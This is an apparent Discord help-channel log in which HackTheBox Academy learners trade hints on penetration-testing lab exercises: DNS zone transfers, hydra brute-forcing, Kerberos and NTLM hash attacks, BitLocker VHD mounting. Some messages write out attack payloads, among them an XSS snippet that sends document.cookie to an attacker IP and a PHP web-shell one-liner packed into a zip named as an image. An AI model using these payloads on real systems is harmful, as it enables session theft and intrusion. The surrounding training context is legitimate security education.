#modules

has anyone been able to do Attacking Thick Client Applications from the new ATTACKING COMMON APPLICATIONS if so please DM me. I have been bashing my head aginst this for a while and im getting pissed bucuse the memory dump keeps updating too fast and I cant do the last step. Thanks in advance 🙂

Generate the tokens and test them through

The commands I've tried are download options, So, is there any read options? or this is how it is.

you might be missing something

My texts disappeared

Did I reveal something too sensitive? 😶

a bit, the answer to the first question in the exercises

but you are on the right path, once you have some working credentials

I've completed the questions, it's just something I'm curious. Like why smbmap with null auth said I had read access

but yet, I wasn't able to download

or read with get file -

False positive?

My bad, I totally forget that was an answer

You need credentials to download it

I see.

I cant get to connect with java application in the next exercise either. Literally the only 2 I have left And Im trying to start the cert exam X.x

the application does not seem to be making the DNS querries like shown in the module. If anyone has done either of the thick client modules please hit me up 🙂

Module:ATTACKING COMMON SERVICES
Section: Attacking DNS
Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
Results:
Stuck on this one. Any hints would be appreciated.

1. I located all three subdomains h.inlanefreight.htb, c.inlanefreight.htb and n.inlanefreight.htb. I might be missing one?
2. Performed dig on all subdomains (dig any @white rock subdomains).
3. Used subbrute on inlanefreight.htb.

For subbrute was the resolvers.txt just inlanefreight.htb? (No need to edit the names.txt) also is inlanefreight.htb in your /etc/hosts

Note* I just tried this yesterday, and did indeed confirm you need to double check the spelling

why cant i specify the password without it erroring?

Because bash is interpreting the !

how can i do it right

Put the password in single quotes

Also spoilers

whops

nobody even saw it :)+

Any password that has any special symbols put in single quotes

alright, i thought double qoutes 😦

Single quotes is literal string

Double quotes allows some parsing to still happen

what if a password is asd!O'

double single qoute it?

@fathom pendant hi yes, the spelling is correct and the only thing in my resolvers file is inlanefreight.htb I was able to find the subdomains but whenever I try to do a AXFR transfer it fails. Tried adding subdomains to my hosts file as well but still nothing

The subdomain is one of the first one that should appear

Dig should allow you to access it

Are you including the @\ipin your dig?

Fucking discord shir

BC some Dingus named ip

nvm found it works now thank you @fathom pendant

Remove the command as it's spoiling

But yeah it doesn't know what that resolved to lol that's why it failed

https://academy.hackthebox.com/module/112/section/1079
I'm have now RDP'd into the server and started the SQL software. now it asks for username and password however after enumerating everything i can't find them. brute forcing is not the goal right? could anybody could give me a hint?

What module?

Footprinting Lab - Medium

That's the one with j* yeah?

j*?

Username

how do i do the discord spoiler thing

Just say yes or no if the username starts with j

Lol

mine starts with a

and ends with x XD

Ok then I'm thinking a different one

Thank you xD

Look for some important documents

ohhh right

That will contain some important login info

^^

Hint: it's a windows machine. What other user could they be for

Admin?

:)

What does ||the stop file -> windefend|| mean?

should i stop the process?

¯_(ツ)_/¯

I'm in the Administrator's documents

You're too far

Try SQL again

so back to the SQL software?

ok

That was the whole point lok

what login name could a admin have?

Also iirc you need to use local auth

Which one do you think translates to local auth

hello,

AD?

Alternative is cmd line and running sqlcmd

Sir

I gave you the second half

I am in the pass hte ticket for windows and tired to xfreerdp into it using
xfreerdp /u:Administrator /p:"AnotherC0mpl3xP4$$" /v:10.129.204.53
But it doesn;t work. Is it normal?
I tried with evil-winrm as well.

Single quotes?

oh really? Let me try..

Azure Active Directory - Password?

FFS

Click all of them

OMG thx it works......... I feel so stupid....

See which ones work

none :/ i get: TITLE: Connect to Server Login failed for user ''. (Microsoft SQL Server, Error: 18456)

There is one that will log you in

sa right

🥲

admin

As I said

Click all options

Try everything

Then come back if truly NONE of your attempts worj

i'm stuck 😦

none of them worked

either with sa or admin

And you tried all the login options from the drop down?

yes

Run ms sql studio as admin

ohhhhhhh

got it the flag, thanks yall.

Don't even need to do that (if rdp as admin)

Just need * auth

Alternative is command line sqlcmd

Can someone help dumb Pass the Ticket (PtT) from Linux down for me.

Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

i found the .kt cronjob but i am clueless on what to do next to get svc_workstations creds.

make sure you've tried to extract all keytab files, not just the one which is mentioned in the script that gets executed by crontab.

Also, I'm saying that assuming that you know how to extract the hashes from .keytab files

but didn't succeed to move further with the one you have

@misty current can I dm you

did you cat the file mentioned in the crontab? You can see where the others .kt are located

Yes one with _all.kt and the .kt. not sure what to do with them I think I tried decrypting them

you're almost there, try to see what you can do with that ".kt" going back through the section

Hello, I just completed Pass the ticket from windows...
But for the remoting part, I succeeded without understanding... 😦

Can somebody explain where the
aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc

Is coming from? I did not see it when I dumped the hashes.

Attacking common services: DNS i've used subbrute and have 4 subdomains, not sure where I go from here, not digging anything up. Help would be welcomed, go easy i'm dumb

You need to find all zones

You should be able to dig one of them @ the ip

We should pin this answer lol. I had this question and I've seen 5-8 others

Also, gz on Community Cont isn't that new?

Relatively

They stole it from me in my sleep

Robbed in your prime

I'm stuck on the assessment. Compromised two users, one being the local admin on SERVER01 but not sure as to what krbtgt to steal

kept digging and got there, thanks!

I am stuck on Password Attacks > Password Reuse / Default Passwords.
The question is :
Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)
What I have done :

• used hydra over an SSH tunnel against server port 3306.
• find a zip on the box (Notes.zip) password protected with a password from the mutated password list.
• reuse of this password and the previously gatherd (from user sam) against the username.list file
  Any hint on this topic would be appreciated 🙂

Notes.zip is not required at this time

ha ok

umm I just realized that I havn't put local users in the userlist

Perhaps a look at history may help

I checked it but was only having my own commands

(havn't checked it as soon as I log on... will try to reset the machine thanks)

Just run head on it

/shrug

I am currently reseting... I had looked at it too lately and the history was flushed I guess

merci !

are you sure to talk about the same question ? here is what I get after a fresh reset :

This is pass attacks, reuse yeah?

Ohhhh

yes ...? (I wonder if you are really asking or asking me to thing again...)

Yeah no use the default creds cheatsheet

lol

It's in there

:p

ohh

thanks

Yeah there's only a few so it's easy to manually try

In the Password Attacks - Network Services module - "Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." ----> found the user, got the list of shares and am only showing 1 with "READ" capability...the flag file does not seem to be found and using "ls" does not work. Anyone have any hints would be super! 🙂

ls -la?

Or dir

should be dir for windows

im missing something obvious on a module if i could get some help

im smol 😔

Ask your question

Instead of just complaining

:p

:p

ok

Anyone free for a nudge on the Kerberos Attacks assessment? I am on the very last part, and have compromised two users (one is a local admin)

For the Footprinting/imap+pop3, I'm having trouble answering the question What is the admin email address?. I found the cto.dev@dev.inlanefreight.htb but that does not seem to be the answer?

You're close. Read the email. You may need to use the 1 fetch <id> body[] to fully see the email info

trying to get the flag for the exercise where you authenticate to a web server with admin:admin and use the dev tools to see what requests its making to find the flag, maybe its hidden in some js somewhere idk

I found the cto.dev@dev.inlanefreight.htb address by using this code curl -k 'imaps://10.129.X.X' --user robin:robin -v but when I login using this code openssl s_client -connect 10.129.X.X:imaps and proceed to login with the username and password, I'm not sure on to utilize the commands correctly? I'm not seeing the email that you're talking about for me to open or get in to??

Well first you have to get to the right folder

Are you refering to the \Answered \Flagged \Deleted \Seen \Draft \*?

No

I'm referring to the 1 List "" * command referenced in the section

It helps to read and understand the section of the module you're doing

Exactly how do I access those dir's?

Refer to the commands listed in the section

It's literally right there

The only command I'm really having you modify is the 1 fetch 1 all to 1 fetch 1 body[]

Yes the brackets are important

MarcieLee, do you think you could possibly give me a nudge if you have done the module?

Haven't done web requests but my guess is its network request or something in dev tools in webpage

¯_(ツ)_/¯

ok thanks, yeah I checked the main request and the other ones in the network tab expecting something to jump out like a new endpoint or something but there was nothing interesting

ill keep poking at it

do you answer to all of us without reading any notes ? just from memory ?

Mostly memory some notes if I'm recalling it was a bit tough

Sometimes it's the fact that the info was right on the page on how to start the enumeration

That's always the first suggestion. Read the section thoroughly

Because 9/10 times you skipped over something

I probably don't practice enough then ...

The tougher it is the more I'll need notes.

(or you often answer the same questions ? :D)

It's usually the same question reworded

And the IMAP one specifically I've linked to articles containing useful IMAP commands

Because I needed those for doing it via command line

indeed, IMAP tutorials were more interesting to me than the academy section content

(there is a way to do it through an email client like evolution)

who wants to do it using the GUI

It's just the fetch example command that I have an issue with

Because it mostly gives garbage aside from just data info, but not the content of the email

Usually the only times where this isnt the case is because its the skill assessment and youre meant to apply the information in a slightly different context.

This too

Though sometimes they're sneaky and it's directly in the example

In which case I mean sorry bro but its a skill assessment lol

Yeah theres plenty of assessments that's just 'do these three sections instructions in order'

👍 Wow thanks!

hi iam having an issue with brute force hydra skill assessment wordlist got first question right but second it finds the password but it does not work hydra -l user -P rockyou.txt -f 188.166.151.118 -s 31557 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='admin_login'" i cannot get the flag as nothing lets me in thx

Attacking Thick Client Applications - c:\programdata\restart-service.exe

Does anyone know how to make this restart-service.exe file appear in that folder? I've reset the box 5 times now and followed the instructions perfectly, but that restart-service.exe file has yet to appear. I've noticed that I can't run powershell on this box, so that seems like a problem if the lab involves running a powershell script.

Edit
Ok, it looks like it took roughly 6 restarts of the box for powershell to work.
I suggest before doing anything on this box, make sure powershell works and once you confirm that, then you can begin. If not then everything you do is pointless.

This section was not a great addition to the module. Information overload for someone who has never reversed before. Teach us how to walk before showing us to how run, it's useless knowledge that we won't absorb properly.

the point is that it gave me a password but when I type it in it fails, i tried modifing hydra command line still get password ok but the login page does not accept it i have even used admin as well the form link ends in admin_login.php it is driving me nuts i am not asking for the flag just a point inthe right direction thank you

typically if hydra is giving false positives its cause the failure condition isnt quite right

also double check youre using the right parameters

Can someone assist me with the password cracking Hard lab? I am not sure what to do with a file that I found.

I am having issuses finding a pathway on a linux pathway

did you try reading the file

That is what I am trying to do. I can mount the share without issue but when I try and mount the vhd it asks for a passphrase and I am not finding anything online about cracking this type of file.

so not sure if I am missing something?

did you ID what type of vhd it is

I am not sure how to do that

in Windows or LInux?

I can run 'file' on it and tells me what OS

what does it say

Windows

This is all I really see, this is from another tool.

You should be getting more than that

iirc its disk encrypted

I see its GPT, but I havent found foudn anything useful about it

sorry screenshot cut off

GPT is just a partitioning type

Mad can you help me after this?

I could be misremembering this section. Its been a hot minute and my assessment notes arent the greatest

idk, im literally in my car about to drive home lol

no worries, ill wait to see if anyone else can help

or if HTB reaches out

thanks man

I am still stuck on this.

If anyone has a way to do Exploiting Web Vulnerabilities in Thick-Client Applications really fast, please reach out through PM. I skimmed through the section and none if it makes sense and it isn't explained, so I'm hoping to just finish it as fast as possible

Not to be rude or anything. Try going a bit slower ask questions along the way and make conections.

For sure, if I really wanted to, I could learn everything in this 1 section, but it would take me days to finish it and a lot of reading/research. I've searched the name of the section here on discord and there are over 30 results of people complaining, one mentioning wanting to commit suicide because of it. I've completed everything in this module except this part and don't find it helpful at all after looking through the material. I prefer to find a shortcut that would allow me to do the sql injection in the least amount of steps possible, so I can reserve my sanity for more productive modules. This module is considered medium and it seems really strange to have everything flow a certain way and then put in a section that's more difficult and time consuming than all 3 final assessments combined.

What module btw?

Linux Basics

I am trying to find the mail file pathway

Haven't done it, but I'll add module, which section and question

System info and the mail pathway question

Check the environment command

Someone doing the AD enumeration and attacks module? Think I just RDP'd into someones box that they'd been using lol got booted off 10 seconds later, so i imagine someone wanted it back 😅

Ok

What is the command sintax?

Just have to type "env" or "printenv"

Heck, you can even type "echo $MAIL"

How did that get past me when I pwd the mail directory

Hi

web request

web deny

What's the baked in windows encryption feature

I'm still trying to figure out how to run 50064.rb in metasploit. I copied it to the same directory structure as exploitdb and updated and restarted msfconsole, but when I search for 50064 in msfconsole, I get no results

Just use it

Literally

@fathom pendant good evening, im hoping for a nudge in the right direction with Web Attacks if your'e available

Haven't done it

well alrighty then, no worries

What exactly is not working?

@acoustic owl I have not everything turned off now, I’ll be working on it tomorrow night if you’re around

I don't know what time zone you live in.
Here is currently morning

@acoustic owl I’m in San Diego right now

anyone able to help me with the HACKING WORDPRESS User enum part please? i am unable to get more than the first user to be displayed via the curl command

which section

Hi, I'm with Linux Privilege Escalation - Skill Assessment, I'm stuck with flag5.txt, can someone help me? Any hints? Can I DM someone? I thin i'm pretty close to getting. Thx.

https://academy.hackthebox.com/module/17/section/89

section User enumeration

use the provided outputs

ive done that but only get ID1 back

how to run commands as superuser

you don't need to run any kind of commands to solve the exercise

https://tenor.com/view/simpsons-gif-4422604

thanks bud

Anyone can help me with module footprinting lab - easy? I know that i need to brute force ftp credentials. I tried ftp-brute.nse from nmap but it takes a long...

try Hydra and increase the threats to 64

Thanks! I'm using (for usernames) the wordlists that htb provides in the footprinting module. But i don't know what wordlist use for passwords. Rockyou is so big...

I'm trying it with seclists

for the username pay attention to the details, check the nmap output scan

OMG thanks!

Can someone please DM me about the Attacking Common Services Easy lab.

Where exactly are you stuck?

<@&861185840277487616>

Thank you

anyone else having problems with target machines? target machines are unpingable.

Scenario, its pingable at the beginning but once I xfreerdp into it, it disconnects after a few seconds

Module: Windows Privilege Escalation

Ev everybody

Wb

I am new

Hey! sup

Hi

Do u know any course about wireshark

For free

yep @lyric raft it happened to me

is it still going? or you just skipped the module for now?

ussaly restarting my pc fixed it

amma get to it later then, thank you!

np

i have a problem: curl: (6) Could not resolve host: admin.academy.htb
i added the ip+ admin.academy.htb in the /etc/hosts...

any idea and vpn is on too

Hello! I got a question about the Session Hijacking part of the Cross-Site Scripting module: is there a particular reason to load a remote script and not just have it directly executed once a Blind XSS is found?
Instead of having a js file with something like new Image().src='http://MY_IP/cookie.php?c='+document.cookie; and sending an injection to load it (eg <script src=http://MY_IP/script.js></script>)
why not just directly inject <script>new Image().src="http://MY_IP/cookie.php?c="+document.cookie;</script> ?
The main pro I see for the 1st method would be the ability to modify the code loaded by the users, but any other reasons?

What is the context? Can you ping the machine?

Can someone give me a hint at https://academy.hackthebox.com/module/112/section/1080 ? I'm in the ssh server logged in as ||tom ||but i can't seem to find the ||mysql ||password. I looked over every hidden file but without success.

I have the username but i don't find the password. I know that it is in rockyou.txt (in line 4000 moreless) but hydra does not find that password

I know the password thanks to the hint and i saw that it is in rockyou line 4000 moreless

But hydra does not find the password, and i would like to find it myself

no i cant

Hint: users often reuse the same password for multiple appss/services

wellllll you're right it does seem so 🙂

got it ty

Which module are you doing?

Anyone knows why appears the error permission denied(public key)?

When i try to connect by ssh

Guys, any idea to whom can I write about a badge not showing up after a couple of modules are being completed ?

In the Password Attacks - Network Services module - "Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." ----> found the user, got the list of shares and am only showing 1 with "READ" capability...the flag file does not seem to be found and using "ls" does not work. Anyone have any hints would be super!

You have to connect to a share with a proper user and password to get the flag.

how did you try to connect to the SSH?

You need to connect to it with the correct private key

i've enumerated the smb users in metasploit, using the resources lists in the module, only one user yielded and while that user has access to the shares, the commands aren't werkin

dm

Hello, can anyone assist a bit with the HTTP Attacks module

is this command okay, sudo responder -A -wf -f -v -I ens224

?

What are you trying to achieve with responder?

obtain user hashes

im doing AD enum and attack module

llmnt nbt-ns poisoning from linux

DM me

llmnr*

You could run the way you did but for llmnr and NetBIOS poisoning, I'd just run sudo responder -I tun0

It'll get the job done

for both users?

It depends, some ad stuff is through a jump host

not sure wym by both users but if you mean both LLMNR and NetBIOS? Then yes.

True that

If they're saying the ens* one, then it's a jump host

not always tho right?

If I'm recalling this exercise it's what they have you do

Hi can someone please help me with a FTP problem. I don't know why, but it always gives me a FTP timeout for some reason, am I doing something wrong?

Ah, for the modules. nvm, I was taking the convo to real life.

What exactly are you doing?

ftp (ip)

This should work without problems so far

result:

ftp: Can't connect to `10.129.58.190:21': Connection timed out
ftp: Can't connect to `10.129.58.190:ftp'
ftp>

For Attacking Common Applications Attacking Tomcat

I cannot seem to find the password. Am I doing something wrong?

Just do ftp ip

Don't need to specify port

I didn't specify no port, I just typed ftp and the ip.

It take some time, but then I get a timeout error.

im doing the LLMNR and netbios poisioning on widnwos

and can not connect to rdp :/

anybody had similar exp?

i treid restarting the machine

checked 100 times the credentials and they are fine

What module

Elaborate sorry, I am still learning so idk wdym by "module"

What learning module are you doing on the HTB academy

Example:
Getting Started

Starting point.

Starting point is on app.hackthebox.com

Correct?

Yes.

Currently doing the Fawn machine.

Then this is the wrong place

Oh sorry.

Read #rules and #welcome

Attacking DNS Module, The target expires before the subdomain brute-forcing even completes 😶

Then you are definitely doing something wrong.
Which module and what exactly are you doing?

I did get 4 subdomains, 3 from seclists. Since I couldn't zone transfer on those 3, I ran subbrute and I got 1 one more, but I couldn't zone transfer that either.

Are you doing dig axfr b.inlanefreight.htb @<IP>

Yup,

Dm me the ones you found

Oh

Wait

You did fuck uo

Look at your dig command

You're missing the .htb

:)

Ahh, True but I tried this command multiple time before and it did show me same error even with .htb

here's an older one

And, I think I just got 2 more when I thought the target died. No way they named one of the subdomain that, lmao

Dm me the list you've found

@unique yarrow

@slow flame

Sent you

Any body know how to access phones and computer (Apple devices) without passwords? I am asking for ethical hacking purpose.

Ahh, I did fuck up. Missing the .htb for the latest subdomain was the mistake. Thanks @fathom pendant

:)

#rules and #welcome , read these

Also I answered you on a diff server 😂

are you still having issues

Yes

give me a sec to go over my notes

Thank you 🙏

you have added the entry to your hosts file, right?

Let's go to DMs

sure, go for it

Hello to everyone, is someone from you doing the atplabs?

from prolabs

the the relevant channel for this

read #rules and #welcome

youll find the correct channel after

I am trying to do "Windows File Transfer Methods" under File Transfers, but when I am attempting to RDP to the target, it keeps timing out and failing, this is from the PwnBox

I have tried resetting both PwnBox and target, but still timing out

Anyone had the same issue, or just me?

thanks

Are you happening to also be connected to the VPN at the same time

I was, does that mess with it?

It does indeed

Ahh gotcha, appreciated!

use one or the other never both at same time

👍

When doing a password attack against a domain controller, is it possible to use the LDAP module of CME instead of SMB ?
LDAP should be faster imo but I am not sure if everybody can authenticate to LDAP (and cme ldap -u 'user.list' -p 'pass.list' gives me error messages suggesting LDAP may not be available Error connecting to the domain, are you sure LDAP service is running on the target ?)
and TCP/389 is opened, yes

I havnt tried messing around with the cme ldap module, but done some messing around with ldapsearch

you could probably script that but idk if its actually be any reasonably faster

Hello guys, I am doing Active Directory Enumeration & Attack module: living off the land

i am stuck at the last question where: Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

I found the one filtering that disabled account : (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)

but not sure about the administrative privileges

can anyone help me?!

am not on that module yet, but do yo have access to bloudhound ?

yeah

can't you use it to identify priviledged accounts ?

yeah but like this module asks me to do with ldap filter so

ha ok sorry

trying to understand those filters haha

and using something like (&(objectclass=group)(CN=Domain Admins)) ?

okie i should try that one i guess

ty!!

I am still struggling on the password attacks hard lab. I have everything I need to mount the VHD file (including password), but nothing is working. I try and list partitions, but there arent any?

mounting it in Linux was a bit of a pain but doable. If youre struggling the intended route is to mount it from windows.

ill try that first I suppose

https://www.linuxuprising.com/2019/04/how-to-mount-bitlocker-encrypted.html

yeah i looked at that too, but my issue is that its not showing any drives or partitions

i dont get it

On "Attacking Active Directory & NTDS.dit" with the question :

On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)

I have created a user.list using the provided firstname/lastname with the tool username-anarchy
Run cme smb with the user.list and the password list provided in the ressources.
I am not getting successful.
Is there a way to bruteforce faster than cme smb so I could consider using bigger password lists perhaps ?

sudo apt-get update; sudo apt-get install dislocker -y
sudo mkdir -p /media/bitlocker
sudo mkdir -p /media/bitlockermount
sudo losetup -f -P Backup.vhd
sudo dislocker /dev/loop0p2 -uYOURPASSWORDHERE -- /media/bitlocker
sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount

Read the Hint

anyone completed last question of SQLmap Essentials? Any tips for where is the POST request??

Too expensive the game hacking fundamentals in my opinion, for what it is

bro wtf lol. I have zero idea why I cant find the partition. Those commands worked

||maybe u can buy something||

i even tried burp suite there:/

burpsuite why

to see all requests

Good to all, I am having problems with the module: "Network Enumeration with NMAP" in the section of "Service enumeration", I do all the Nmaps that indicate in the module, even I investigate a little and I take out the banners with the script "baner" or with a netcat. But whatever I put in the answer, I can't find the solution, do I have to connect to any of the devecot found, and if so, how? I can't find passwords anywhere apparently.
The result of the nmap is the following:

PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10
80/tcp open http
110/tcp open pop3
|_banner: +OK Dovecot ready.
139/tcp open netbios-ssn
143/tcp open imap
| banner: * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID.
|_ENABLE IDLE LOGINDISABLED] Dovecot ready.
445/tcp open microsoft-ds
31337/tcp open Elite

which question ?

Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer. I was reading another answere, but i am stuck now

any other tip for this bro?

did you tried netcat to do banner grabbing ?

nvm i found it thanks a lot

I don't remember of the solution, but according to your nmap output, can't you find something on the 31337/tcp port ?

In one of the NMAPS that i do, i found something like TCP/IP finger print, i donmt knwo if you refer about that

I tried also with scripts of nmap and similar things. But i not found anything. I think that maybe i didnt see something.. but i spent a lot of hours in this :(((

you can do banner grabbing using netcat

some services may takes too much time to answer and nmap might not get info you will get using nc on targetted port

OK, i will try¡¡¡ if I get it (or not hehe:( ) I'll let you know 😄

FOUND IT¡¡¡ was the banner, i dont know reason but in last port not show banner correctly with nmap¡¡ Thanks you so much

as explained above, the service takes too much time to answer so nmap won't grab the banner. You may reread the course as it is well explained

Hello everyone!
Module: Password Attacks
Section: Attacking Active Directory & NTDS.dit
Last question. I can't copy the ntds.dit file. I already did the copy of "C:" 2 times(that's why there is harddiskvolumeshadowcopy<2>)

solved)

damn just 15 people

Can I DM someone about Attacking Common Services - Easy? I've got the user, got access to ||mysql|| and know I need to ||upload a web shell|| but when I do that ||I get a 404 error navigating to it||

nevermind, for those looking back I fixed it by doing / instead of \ in the ||sql query||

What badge is it?

Which module is this?

~~hello, working on Linux Privilege Escalation skills assessment flag5
I've found the binary that the user can run as sudo, but when I try using the command from GTFOBins

!/bin/sh```
I get /bin/sh not found
am I doing something dumb?~~
I was doing something dumb

I noticed you resolved the "Unexpected json response" error. I'm getting the same error. Any hints? I've tried using different payloads

Did you get it resolved? The exploit did not show up for me by searching for 50064 in msf however "using" it allowed me to configure it and run the exploit. I ran into another error though

hi all, can someone advise for File Inclusion module, what does the hint '..see what path the regular functionality uses'?

if I remember correctly check vhosts setting

sup

hello guys for the Active Directory Enumeration & Attack: Kerberoasting - from Linux, do we have to crack the password for user "forend" ?

seems like previous password doesn;t work 😦

I was confused on this also... I just used the sqldev password from the section write up

may i get assistance with a module, possible issue with content

Just ask your question

Here everyone gets support with the modules. What is it about?

bro why are you blue?))

#📣-announcements message

Ask HTB why

They've been marked as superior beings

can i post photos&&files here?

yeah

i think i may have gotten the wrong data back to a table not askexd for , however i need a second opinion if [possible

Try to avoid posting spoilers (answers)

Try checking for phantom spaces before and after your answer

You're searching for the wrong table, remember to view and intercept the request on case#3 page and modify your the position where you want to insert payloads accordingly

But also please remove your photos and upload ones with answers edited off

The answer you have is flag1 as shown in the output as well

Is there anyway to reset you're learning path and progress

They do have a "retake module" option for each module. But, not sure if that'll reduce the path progress.

where is that option att??

It's usually at the completion page where you get redirected after finishing a whole module. I think you can access it directly by just accessing the last section of the module and hitting the 'Finish" button

😅 😊 sorry

thank you

please actually remove the images tho as they still spoil content

@terse igloo No problem. Also ☝️

They did it

how to remove the file tho i did the photos

Just delete it

aw got it

not use to discord, mor e irc and telegram user

Also your file didn't have an extension

So it wasn't going to load

ok 🙂

hmmm not seeing anything like that

sorry for the delay, this is why i asked another fellow in another chat to assist via dm, to prevent sharing the answer content, however since it pertained to answering i felt need ot leave the answer open to see if it was accurate

so i am sorry for that 🙂

it will not do anything with answers

just the same as "view" on dashboard

Ah, never used it. That's all it does huh.

curious

man i cant even find that huh odd

i am always trying to reread😂

CTRL+F)

Password attacks > Pass the Hash: Can someone give me hint on how to get the NTLM hash of David account? I tried to use crackmapexec --lsa but the hash dumped by that command is not accepted as the answer

Use mimikatz

Hi, working on tier 0 modules started with file inclusion one, but on the third section under File Disclosure "php filters" it tells me to fuzz an application and I haven't done that module, should I swap modules ? and finish Ffuf first ?

Did you try with mimikatz?

I tried mimikatz with the given Administrator hash. Do I need to find a way to logged in as david before running mimikatz?

Did you try to run mimikatz? What is the output? EDITED: Regarding crackmapexec to dump LSA requires Domain Admin or Local Admin Priviledges on target Domain Controller

The target doesn't necessarily needs to be the DC to dump LSA

when it comes to dumping secrets, Mimikatz just does it better as far as I've heard.

at the end is the same using mimikatz to dump the creds in memory

depends on the situation

Yup

just running Mimikatz on an Administrator shell is all you need.

Also I don't remember for this particular section, Maybe David is a local user on that machine? you'd need to dump the SAM then

mimikatz works just fine dumping the lsass

When i tried this all i get back is the hash of the administrator account that I've already had

Tried it already, SAM doesnt have a user named david

one of the two possibly will dm you to see the output of the command

You might just not be submitting the right hash, or having the format wrong

What role ensure that obj in a domain are not assigned the same SID ??? In introduction to Active Directory

Why it is not accepting my answer.

usually, this happens when it is not the correct answer

RID master is the answer but it says wrong

well, because perhaps it is expecting it to be in an another form

Found it thank u.

Having the same problem now, how did others who completed the path beat this one?

Hi guys i have a questions about the module File Inclusion

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

this is work but why the next command don't :

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.txt shell.php

zip warning: missing end signature--probably not a zip file (did you
zip warning: remember to use binary mode when you transferred it?)
zip warning: (if you are trying to read a damaged archive try -F)

which section in File Inclusion module are you doing? @boreal basalt

why hydra always give me wrong password

hydra -l user -P rockyou.txt -u -f IP -s PORT http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F<form name='log-in'"

what am i doing wrong

is it https or http?

-u flag is for SSL connection?

also are you sure that "user" is actually the username

http

i think im sure

remove the -u then try

Where are you running this command?

Guys

In the file upload

Why any php code does not executed

It said always xml processing not supported in html ??

Hi how can download and execute a file in powershell 2.0?

on AD enum and attacks password spraying making a target user lsit

it say

says*

" Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmith.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint? "

how do i know what is the ATTACK01?

still doesn't get the password

-u doesn't matter. It just rotates the usernames instead of the password when brute-forcing.

is there anything i should fix in the command?

the password still not correct and hydra's result always changes

What's the section name for this module?

login brute forcing skills assessment - web site

question2

oh i got the answer now.

i forgot to put = after :F

thanks man

Good job finding it on your own 👍

Hello all. I'm doing the module Getting Started and for some unknown reasons the server at public exploits section is down. I tried refreshing, using pwnbox but no success. Someone help

Got it thanks

Good morning everyone 😊
I am in password attacks, credentials hunting in Windows
When i use lazagne.exe it closes the prompt as soon as the scan ends, i can't view the results

Where does one find Intro to Zephyr track?! Cant seem to locate such track

Probably on the main site if I had to guess

I was thinking it will be one of the modules...Thanks Marcie!

guys i need help for stack based buffer overflow on windows x86 module / part // remote fuzzing m stuck here from 2 days pls help

@opal jewel can u help u r pro

What is your actual question that you're stuck on.

Cant**

@fathom pendant i m connected to windows machine using rdp okay ,, i also made a python script that will send buffers 500 and +500 everytime but i m not getting how they used the script

@fathom pendant can u join vc so i can show

No

@fathom pendant why

Try a secondary resource to maybe get another explanation on bof

Tib3rius has a good guide and TCM on youtube offers an easy explanation

you don't have permissions to stream

I think what you're searching for is the Penetration Tester path?

I found it already. Thanks!

btw, i love the integrated terminal, but wish i could pop it out to a new window like pwnbox

True, I just pull out the tab to a new window and use it that way sometimes.

oh yeah that's a decent idea

Has anyone here done the attacking FTP service module recently? It is not accepting any of my flags/answers. Very confused lol.

I brute forced FTP using the resoruces file and got a hit on a user, but it wont accept the answer for the 2nd question. I also SSH'd into the box using the account I found and got the flag for the last question, but it is not accepting it either.

Reload the module page.
Sometimes the answers are not accepted. After you reload the Academy page, it works again.

I think there is something funky going on with the boxes that are spawning. The flags that I am finding are referecning an SMB attack, not FTP. Ill try restarting the target a copule times. Not sure if anyone else has seen this.

no dice, i guess ill just wait for HTB to reach out

What module?

Its the attacking common services module, attacking FTP.

And what happens when you ls?

in FTP?

Yes

Once i found the user for FTP I logged in and there is a flag.

Funny enough, its the same flag as when you SSH into the box (as the last question says)

but the 2nd question wont accept what user I am using FTP as, and it wont accept the flag.

But, when I movve onto the next session (attacking SMB), it accepts all my answers lol

something buggy

the platform is acting like its spawning the smb attacks box, not the FTP one

r* yeah?

No. I spawn the box on the FTP module and I get a hit on FTP as J****.

So its acting like its not spawning the right box

cause J**** is for the SMB attacking module

It uses the same box

For all sections

ah that would make sense lol

ill try it again then

Don't forget to utilize the resources

Took roughly 2-3 minutes and hydra spat out the right answer for me

I am, and its only spitting out one user/password and its the J**** one. I figured out the username from what you mentioned, so I am only brute forcing with that to see if I can get the pw

Note I used default threading

Are you attacking the right port as well? (-s option)

Yeah attacking the FTP port it did not give me the j* username

This is where I am getting confused. I am using the users.list and pw.list from Resources and I am attacking port ||2121||. The ONLY hit i get is J*.. I am trying again with Hydra and using R* as a username. We shall see.

Can you DM me your screenshots as I'm now curious

Yes, i appreciate it

alright. I have been beating my head for days. AD skills assessment II. questions 10- get the flag from DC01 admin desktop. Have seen a few other people ask with replies of you dont need to login to DC01. and check the perms of the last user you got. which is C****. Tried running through numerous enumerations in the AD and win priv modules. Gone in lots of circles. nothing.

check file explorer

Guys what modules should I do to be able to pwn atleast the easy boxes

you can check academy x hackthebox

Yeah ive done the following, Intro to networking, Metasploit framework, Web reqeusts, attacking web apps with ffuf, network enum with nmap

ive done these fully

Completing the CBBH track

Whats that

use htb x htb labs

